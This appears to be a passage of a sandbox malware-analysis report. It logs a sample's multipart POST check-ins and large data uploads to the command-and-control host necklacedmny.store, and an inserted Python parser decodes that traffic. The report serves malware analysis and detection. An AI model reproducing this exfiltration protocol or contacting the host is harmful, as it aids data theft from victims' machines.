                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1195&sent=8&recv=19&lost=0&retrans=0&sent_bytes=2845&recv_bytes=16024&delivery_rate=2473099&cwnd=239&unsent_bytes=0&cid=664ad5736fba1fb5&ts=554&x=0"
                                                                        2024-10-30 05:16:05 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a
                                                                        Data Ascii: 11\r\nok 173.254.250.78\r\n
                                                                        2024-10-30 05:16:05 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0\r\n\r\n


                                                                        Session ID: 4 | Source IP: 192.168.2.5 | Source Port: 49708 | Destination IP: 188.114.96.3 | Destination Port: 443 | PID: 6136 | Process: C:\Users\user\Desktop\file.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-10-30 05:16:06 UTC | 284 | OUT | POST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 20572
                                                                        Host: necklacedmny.store
                                                                        2024-10-30 05:16:06 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 36 36 42 35 33 31 31 31 41 39 30 39 30 37 32 37 32 31 30 41 38 43 44 38 39 33 34 38 31 35 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"266B53111A9090727210A8CD89348154--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                        2024-10-30 05:16:06 UTC5241OUTData Raw: 5a 3e 93 af 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                        Data Ascii: Z>56vMMZh'F3Wun 4F([:7s~X`nO
                                                                        2024-10-30 05:16:06 UTC | 1017 | IN | HTTP/1.1 200 OK
                                                                        Date: Wed, 30 Oct 2024 05:16:06 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=khgt1q3a1afqq0ogr2jhma2n23; expires=Sat, 22 Feb 2025 23:02:45 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        cf-cache-status: DYNAMIC
                                                                        vary: accept-encoding
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0Pa2YjGAu8daJVU2xpqH3966tesKKCmJniwgXCEkJjbILejPduk5TJ0nBIOteN9h5vWhwzYsrHhPXVEFeNzDBCf22EU4z3nF%2B6LVzvIcR5hSj1o%2FPnUJzHutmD%2Fgu7jMDi5vjnk%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8da8ee6aba7b47fd-DFW
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1291&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21536&delivery_rate=2296590&cwnd=212&unsent_bytes=0&cid=c94231ca1c23dd34&ts=616&x=0"
                                                                        2024-10-30 05:16:06 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a
                                                                        Data Ascii: 11\r\nok 173.254.250.78\r\n
                                                                        2024-10-30 05:16:06 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0\r\n\r\n


                                                                        Session ID: 5 | Source IP: 192.168.2.5 | Source Port: 49709 | Destination IP: 188.114.96.3 | Destination Port: 443 | PID: 6136 | Process: C:\Users\user\Desktop\file.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-10-30 05:16:07 UTC | 283 | OUT | POST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 1247
                                                                        Host: necklacedmny.store
                                                                        2024-10-30 05:16:07 UTC1247OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 36 36 42 35 33 31 31 31 41 39 30 39 30 37 32 37 32 31 30 41 38 43 44 38 39 33 34 38 31 35 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"266B53111A9090727210A8CD89348154--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                        2024-10-30 05:16:08 UTC | 1016 | IN | HTTP/1.1 200 OK
                                                                        Date: Wed, 30 Oct 2024 05:16:08 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=e783r5pq1tc4u7g5eouvfkacfe; expires=Sat, 22 Feb 2025 23:02:46 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        cf-cache-status: DYNAMIC
                                                                        vary: accept-encoding
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XSII47fy1cQAX1q4IYcyy0QssL4%2FSpmZqvbw5P%2F6NypOhAOTjh7wibtTVUwLIXonNmE6kElxluJCRsVqVlIZZGVJKCZUlKAZrffCQeKPvhuiXal2lVmjTP%2BVc280%2B0TWUiN46hI%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8da8ee744abc4867-DFW
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1193&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=2166&delivery_rate=2409317&cwnd=242&unsent_bytes=0&cid=273973d82e9f5141&ts=440&x=0"
                                                                        2024-10-30 05:16:08 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a
                                                                        Data Ascii: 11\r\nok 173.254.250.78\r\n
                                                                        2024-10-30 05:16:08 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0\r\n\r\n
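Every session in this part of the report follows the same exchange: a multipart/form-data POST to /api on necklacedmny.store with a fixed boundary, a Chrome/119 User-Agent and form fields named hwid, pid and lid, answered by a chunked body that reads "ok 173.254.250.78". The script below is an added example, not code from the sample, from Joe Sandbox or from the LummaC authors. It reassembles the reply from the exact bytes shown in the Data Raw rows, recovers the boundary from the captured request headers (copied from session 2) and parses a multipart body of the captured layout. The body itself is a constructed sample: the report truncates every body dump, the lid value is cut off after 4SD0y4, and the closing delimiter is assumed; what the fields mean to the malware is not established by this report, so the parser only extracts them.

```python
"""Decode the file.exe -> necklacedmny.store check-in seen in the sessions above.

Added example, not code from the sample or from Joe Sandbox.
"""
import re

# Request header block exactly as captured in session 2 (284 bytes on the wire).
REQUEST_HEADERS = (
    b"POST /api HTTP/1.1\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Content-Type: multipart/form-data; boundary=be85de5ipdocierre1\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    b"(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36\r\n"
    b"Content-Length: 12840\r\n"
    b"Host: necklacedmny.store\r\n"
    b"\r\n"
)

# Constructed sample body: the three parts copy the field layout visible in the
# capture; the closing delimiter is assumed (the report truncates every dump)
# and the "lid" value is cut off after "4SD0y4" in the dump.
SAMPLE_BODY = (
    b"--be85de5ipdocierre1\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n\r\n'
    b"266B53111A9090727210A8CD89348154\r\n"
    b"--be85de5ipdocierre1\r\n"
    b'Content-Disposition: form-data; name="pid"\r\n\r\n'
    b"2\r\n"
    b"--be85de5ipdocierre1\r\n"
    b'Content-Disposition: form-data; name="lid"\r\n\r\n'
    b"4SD0y4\r\n"
    b"--be85de5ipdocierre1--\r\n"
)

# The two reply chunks exactly as shown in the Data Raw rows (23 + 5 bytes).
RESPONSE_CHUNKS = bytes.fromhex(
    "31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a "
    "30 0d 0a 0d 0a"
)


def boundary_from_headers(headers: bytes) -> str:
    """Pull the multipart boundary out of the Content-Type header."""
    m = re.search(rb"boundary=([^\r\n;]+)", headers, re.IGNORECASE)
    if not m:
        raise ValueError("no multipart boundary in request headers")
    return m.group(1).decode("ascii")


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Return {field name: raw value}; values stay bytes because later
    sessions carry binary parts, and removesuffix() drops only the part's
    own trailing CRLF, unlike rstrip(), which would eat 0x0d/0x0a data."""
    delim = b"--" + boundary.encode("ascii")
    fields = {}
    for part in body.split(delim)[1:]:
        if part.startswith(b"--"):          # "--boundary--": end of body
            break
        head, sep, value = part.partition(b"\r\n\r\n")
        if not sep:
            continue                        # truncated part, as in the dump
        m = re.search(rb'name="([^"]*)"', head)
        if m:
            fields[m.group(1).decode("ascii")] = value.removesuffix(b"\r\n")
    return fields


def decode_chunked(data: bytes) -> bytes:
    """Reassemble a Transfer-Encoding: chunked body up to the zero-size chunk."""
    out = bytearray()
    pos = 0
    while True:
        eol = data.index(b"\r\n", pos)
        size = int(data[pos:eol].split(b";", 1)[0], 16)   # ignore chunk extensions
        pos = eol + 2
        if size == 0:
            return bytes(out)
        out += data[pos:pos + size]
        pos += size + 2                                     # skip the chunk's CRLF


def parse_checkin_reply(raw: bytes) -> tuple:
    """Split the decoded reply into its status word and the remainder."""
    text = decode_chunked(raw).decode("ascii", errors="replace").strip()
    status, _, rest = text.partition(" ")
    return status, rest


def summarize_checkin(headers: bytes, body: bytes) -> dict:
    """One record per session: request line, Host, field names and hwid."""
    request_line = headers.split(b"\r\n", 1)[0].decode("ascii")
    host = re.search(rb"^Host: ([^\r\n]+)", headers, re.MULTILINE).group(1)
    fields = parse_multipart(body, boundary_from_headers(headers))
    return {
        "request": request_line,
        "host": host.decode("ascii"),
        "fields": sorted(fields),
        "hwid": fields.get("hwid", b"").decode("ascii", errors="replace"),
    }


if __name__ == "__main__":
    print(summarize_checkin(REQUEST_HEADERS, SAMPLE_BODY))
    print(parse_checkin_reply(RESPONSE_CHUNKS))
```

The header block as reconstructed is 284 bytes, which matches the "Bytes transferred" column for sessions 2, 3 and 4 (sessions 5 and 6 differ by one byte either way because their Content-Length values have four and six digits). Run against a full pcap, the same functions can be applied to each session's body to compare the hwid across sessions and to see whether the lid and pid values change.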


                                                                        Session ID: 6 | Source IP: 192.168.2.5 | Source Port: 49710 | Destination IP: 188.114.96.3 | Destination Port: 443 | PID: 6136 | Process: C:\Users\user\Desktop\file.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-10-30 05:16:09 UTC | 285 | OUT | POST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 585622
                                                                        Host: necklacedmny.store
                                                                        2024-10-30 05:16:09 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 36 36 42 35 33 31 31 31 41 39 30 39 30 37 32 37 32 31 30 41 38 43 44 38 39 33 34 38 31 35 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"266B53111A9090727210A8CD89348154--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                        2024-10-30 05:16:09 UTC15331OUTData Raw: 34 b4 a1 d4 16 2e 35 73 ce f4 f3 13 fa ad b3 7e 24 a3 17 b5 47 7c 45 25 92 61 d4 ca fa fb 27 b0 dd 48 59 03 ac 89 e2 f7 a3 59 42 4c 84 bf 75 8b 03 82 7d f9 6a 80 df 58 4a 76 ef ed 90 76 e8 90 2a e9 30 50 1b e6 da fa 3d 92 1c 03 dc ce ca 65 06 34 9b d2 8c 25 80 a4 c7 a1 41 aa 0f 43 5f 02 96 a7 10 d8 81 db f0 91 41 cf 42 8c d6 fd 20 d9 9a 17 50 bc 2a fa 97 c2 e0 ea cc 7e 7b 85 25 e1 0b c1 47 e0 57 d4 26 3e 0b 56 73 4f de c1 7b 45 22 d7 4e 52 02 dd 20 c6 93 57 a0 0d ae 06 5b 86 d7 d6 ed 8b d1 a0 ce af e3 ef 4a cd 55 69 2c 9c 11 8c a3 1d 42 74 05 ea 46 25 42 86 af 83 24 30 26 bc 22 bd 3b 3a 10 43 47 92 47 22 53 75 6d 36 43 07 33 4d 99 9e 0f fb 1b 79 d5 30 2e 83 b6 f2 8d 69 1b 0d a0 3d cb 34 e1 93 a1 26 4b cd d4 0a 30 69 10 e6 e9 6a 5e 2c 94 fd 4b 75 8c df ed
                                                                        Data Ascii: 4.5s~$G|E%a'HYYBLu}jXJvv*0P=e4%AC_AB P*~{%GW&>VsO{E"NR W[JUi,BtF%B$0&";:CGG"Sum6C3My0.i=4&K0ij^,Ku
                                                                        2024-10-30 05:16:09 UTC15331OUTData Raw: cb 77 7e 77 37 2f a8 0f 06 d4 72 54 c7 1e a9 98 8d 49 39 6a f9 66 11 26 82 63 85 12 41 c3 6b 6e d4 50 7a 32 de 0a 84 29 4c 14 cc 77 95 03 4d 94 db a3 56 82 58 5a 57 33 82 af 01 fb 50 42 0b fa 9e 78 28 d5 87 fd 7d a8 51 4a cd 89 64 4f 9f e4 ee d3 46 69 24 35 be 17 52 99 d9 ed bd 70 f5 09 9e ad 89 82 93 e5 af cc 45 b6 ce 53 85 e0 78 84 b2 2e 83 2d c0 f5 3c b9 6a d2 98 aa 8b f6 8a 6f 8b 7f 57 35 09 8a 04 6a 94 21 45 c0 3f 35 cc fd 39 2c f8 f7 34 7d 3b 4b 90 a5 3e 28 95 16 a3 b3 ee 36 da 55 6b 80 bd db a9 7e c5 05 67 73 88 f4 8b ee 7c 54 e1 de e2 81 bd 48 29 0d 12 1a 3c 77 7e ef 7f 89 a1 17 d3 72 dd 1a 1c ad 31 56 f2 21 20 80 5e b5 39 2c d3 ae 71 94 14 11 75 4f 52 14 37 c9 4f b5 65 a5 53 13 40 8b d6 e2 64 e5 01 02 c1 34 93 ed fe c5 84 5f a6 d7 f8 be d5 09 6d
                                                                        Data Ascii: w~w7/rTI9jf&cAknPz2)LwMVXZW3PBx(}QJdOFi$5RpESx.-<joW5j!E?59,4};K>(6Uk~gs|TH)<w~r1V! ^9,quOR7OeS@d4_m
                                                                        2024-10-30 05:16:09 UTC15331OUTData Raw: 37 26 a8 da 08 34 e7 fd 8f 5f a4 7d 1c c5 73 d2 83 97 ba 84 6b cb ff 8e 12 41 aa 73 65 47 d5 a7 85 36 6e 4c 18 96 22 06 72 dd fe 39 f6 4e 38 61 40 30 02 58 6e c2 48 6a 3b 82 92 e9 87 34 c6 40 bb c6 f6 3d 03 94 97 ec 6b 1a ff 9e 47 90 bd b7 a8 7f 97 77 76 ce a1 55 cd ff 80 92 20 c0 89 06 6b e2 20 e9 a5 bd 28 e8 e2 4c 55 0d 57 78 e9 cc 0e c9 42 8a 3d fd 72 07 c2 06 81 b7 d8 35 26 83 8a 98 20 68 da 3c 4f 6b 22 64 6b 60 ee 48 46 13 e0 a0 f2 1c 76 4d 57 e7 df 66 d4 86 a3 07 4c 98 c1 3b db c4 2b 58 e0 7f c4 83 7f 06 c0 c0 cc 93 13 7d 63 1f 45 7a ed 14 02 48 b0 e7 cb 46 08 ce cf 6a 4d 2c 2a 1d e5 f0 70 5a 19 a2 5b ad f2 9c a2 06 b2 ae 9a 0a 8d c9 ce c7 23 c8 98 c8 a8 db a7 a5 b7 2f 18 d6 df 6b 98 fd 58 88 55 38 90 2a 62 83 a3 40 91 bb 0b ec cc 61 40 20 e6 c3 fd
                                                                        Data Ascii: 7&4_}skAseG6nL"r9N8a@0XnHj;4@=kGwvU k (LUWxB=r5& h<Ok"dk`HFvMWfL;+X}cEzHFjM,*pZ[#/kXU8*b@a@
                                                                        2024-10-30 05:16:09 UTC15331OUTData Raw: ec 14 53 ad 1b da 57 48 8e 3a ca b0 f7 ca 2f 16 ef 38 fe 49 59 95 6e b4 e1 5d 70 6d fb 9f f7 cd 64 05 99 95 81 43 6a 95 ed e1 d6 94 4c d0 52 ef ed 13 8e 7f 4e 7f 02 b5 98 67 89 d4 06 6b 55 97 d9 45 53 8b 79 a1 93 46 85 c7 ce c7 2f 4e 08 93 6a 48 0a d3 5b 75 2f 84 e8 ee ff 44 5c f1 7e 39 07 97 10 01 a0 b1 f8 49 ea ca 04 8a f1 67 20 ef 14 d4 b9 c3 e6 c2 41 9b 74 47 8b 9a ae f0 64 05 fc bf 13 04 77 44 6a cf 6e 79 f1 a3 e6 88 1e 72 f4 d5 d6 cd 7e c7 9f ae b8 f5 20 b3 67 c8 fe d8 19 1d 90 2f cc 9a 9e 85 01 17 54 f8 ee dc 0e bc dc ff 81 b0 1f a6 b8 7f e7 c0 f7 02 58 99 74 27 5f 53 e6 c0 84 ac 1f 90 fb 2d fb 07 03 07 f5 8e e6 ec e1 05 08 82 e7 df 0c 13 d6 65 f3 03 f9 69 f4 78 f6 13 04 a3 86 2b fd ea 47 95 26 aa fa f1 56 e2 69 5f fc 71 69 c5 b3 32 aa 2e a1 51 90
                                                                        Data Ascii: SWH:/8IYn]pmdCjLRNgkUESyF/NjH[u/D\~9Ig AtGdwDjnyr~ g/TXt'_S-eix+G&Vi_qi2.Q
                                                                        2024-10-30 05:16:09 UTC15331OUTData Raw: 24 50 bd 7b 2d 7b 19 c8 7d 51 8c a4 3d bb 44 a5 c7 e4 45 87 1c 61 b5 55 be 09 8f df 79 31 08 47 74 61 20 32 58 45 c9 8f a8 71 e9 4a ab cd 5a cd 2e 82 27 b8 b8 df dc d9 29 39 2c 92 86 81 41 58 7f a6 38 fe d1 33 f3 bc fa b0 4b 5c 44 84 0a 82 0e 89 c6 79 56 6d 7c fb ac d9 27 45 28 a9 56 af 69 cb 9a 91 49 88 5b 46 ab 71 ac bb d2 ca 78 c6 9e b5 6b 0f 8b f1 9a 7f 0b 65 2a bd 64 24 42 6e 0a f4 d0 8b e6 93 03 61 62 b8 37 21 f1 cb 3c ce 43 f2 b3 d6 4c 5f 1e 7e 61 72 53 85 81 5e 88 f0 fb 51 b6 35 c9 2c c0 ee 0e d6 44 cd 56 95 11 8a 16 22 ce 51 f0 cb 3c ab b5 74 0d 0d 1b e2 55 24 57 f0 f7 35 7a 7b 5f a4 80 99 b7 0f 2c d7 8d 2d f4 8b f9 0f 46 8e 56 18 4a ad 6e 2d a8 3f bf ce fd 60 87 39 4c e6 08 61 61 d6 1b 04 48 09 3c 79 30 59 20 79 df cd 27 e6 85 26 eb 1e 5b 7f 65
                                                                        Data Ascii: $P{-{}Q=DEaUy1Gta 2XEqJZ.')9,AX83K\DyVm|'E(ViI[Fqxke*d$Bnab7!<CL_~arS^Q5,DV"Q<tU$W5z{_,-FVJn-?`9LaaH<y0Y y'&[e
                                                                        2024-10-30 05:16:09 UTC15331OUTData Raw: 65 5c 9a 8f 72 45 0d 2e 3d 6d c3 03 49 93 ff 1b 81 19 20 22 f0 bf 31 1e df 92 e1 ca 47 20 0e 30 c7 a0 ed 63 a5 b8 19 01 a6 53 16 e6 d5 00 3e 3f 17 a7 ec 0c 01 4c bb 89 90 9d 72 1a 16 3e 21 9b 13 92 7e 09 3e f5 5a 29 1d ef ad b7 a0 ae ae fa f0 12 cd 0f 6d 8c 09 9f 9b 78 d1 e8 b5 5f 4c 5e 15 6a 65 e5 f9 f3 0e e8 0b e9 6c 0f a2 e0 f3 e8 0b fb bd d9 66 9e af 8b 09 b6 70 4e 1f 08 5c c6 5c 1b 4c 6d 5a 73 39 96 78 c4 09 09 ee 58 08 f0 6f e1 41 69 f4 41 64 15 f6 34 e8 c0 b2 1b 17 58 13 35 94 a9 af 2a 39 05 4d 86 86 9a 92 39 47 28 b1 a8 e8 34 4a a3 81 9b 4b dd fe 2d ca a8 3a 94 56 c6 b3 c2 bf 7c 4d 94 04 62 63 ce 73 4e 83 42 64 41 8c e7 a2 d9 e0 19 c6 3d 71 d6 8d c5 68 5d 8e 7d 0f 2e d7 1b 2b 86 12 90 2f fc a5 2c 8c 57 5c b3 7a f3 df f6 78 53 12 6e 15 b3 f4 f6 20
                                                                        Data Ascii: e\rE.=mI "1G 0cS>?Lr>!~>Z)mx_L^jelfpN\\LmZs9xXoAiAd4X5*9M9G(4JK-:V|MbcsNBdA=qh]}.+/,W\zxSn
                                                                        2024-10-30 05:16:09 UTC15331OUTData Raw: 46 91 92 6b 5c 1f 90 db ff cb 7c ad 28 ab 30 87 01 fc 7d 1e d6 ea 74 f9 09 b6 68 a7 f3 0e 61 92 2e 34 ab d9 f9 3b e1 4e 75 14 55 77 9f 95 2b bf f0 1f fc 31 f5 b0 35 b0 72 c5 f7 5e 15 2d 43 c9 d5 5c 68 3c ce f6 b8 29 ac dc 1c 9c 87 05 16 59 68 82 cf c0 3f b7 fe b3 35 08 f3 34 14 4c db fd e2 17 31 8a 2d 38 e7 a8 27 49 bc d5 7c 55 71 60 87 54 59 75 28 ef bf 47 51 2f ee d2 fe 58 a3 c9 08 af 1b 4e f8 9d 89 91 19 e9 f1 ce 63 7d fb c4 3e cd 71 ec 2a 0b 39 b5 bb 04 fc a9 7c 9e ed d4 ef d4 df 5c a6 e9 b4 ba 9e 10 a7 a3 aa 3f 0c 08 69 9f e9 a5 c6 0d 52 e0 66 61 1f fb 02 ef 46 d4 1d 58 58 4b 5e 09 0c a6 cc ad 2f 8d 19 af 97 e7 f1 c1 05 0b 46 de 2a d7 50 6e d0 1e 6e 01 5b a7 aa a2 04 50 df 3d da 43 1c c5 c0 7a 77 9b 57 de b1 b6 0a 23 7c 06 fa 3f cd 37 cc f3 d3 a8 fa
                                                                        Data Ascii: Fk\|(0}tha.4;NuUw+15r^-C\h<)Yh?54L1-8'I|Uq`TYu(GQ/XNc}>q*9|\?iRfaFXXK^/F*Pnn[P=CzwW#|?7
                                                                        2024-10-30 05:16:09 UTC15331OUTData Raw: 44 bd 3a 2a 5f 25 3f 38 bf 7c 0d 3f ee 06 50 03 cb 19 55 0f d3 ff b5 49 d0 b0 89 62 db 88 29 cb e8 4e bc bd cc e9 4c 45 83 4f ab 11 5a c0 52 43 e3 f3 2a ea cf c7 6e db b0 f4 66 56 81 f7 e6 b4 dc 15 bc f0 10 91 8d 65 36 ca 50 16 b5 36 89 db 0f 6a 81 33 18 58 1a 3a 5b 9f 5e 17 e6 75 68 ea e6 75 ae 60 f5 72 ab 66 82 d8 8d ca 17 4b 68 4a a2 4d a2 16 b8 b1 d5 39 52 e7 0c ea 24 f9 4f d8 2e 0d 99 10 dd 73 98 97 05 9b c8 b7 e9 da ee 45 26 ff a1 eb e3 6c 86 2b 31 51 76 bf 57 9c ef 32 08 bf dc b1 61 91 70 c7 5a f4 70 c3 10 61 2d b3 8e 26 2c f8 06 0f 41 7c da 93 96 b6 e9 a8 aa e9 7b fe eb 77 a8 74 e3 cf 28 57 d9 b1 c8 b0 81 0f 12 19 e9 cd 6b c3 d2 7f ca 7c 36 2f 39 fb d0 f2 06 d9 6a b4 04 6f 74 bb 98 c5 6a 74 08 86 a6 82 56 00 87 84 2d 0a 6d 87 c6 7f 8f ab 0f 0d 36
                                                                        Data Ascii: D:*_%?8|?PUIb)NLEOZRC*nfVe6P6j3X:[^uhu`rfKhJM9R$O.sE&l+1QvW2apZpa-&,A|{wt(Wk|6/9jotjtV-m6
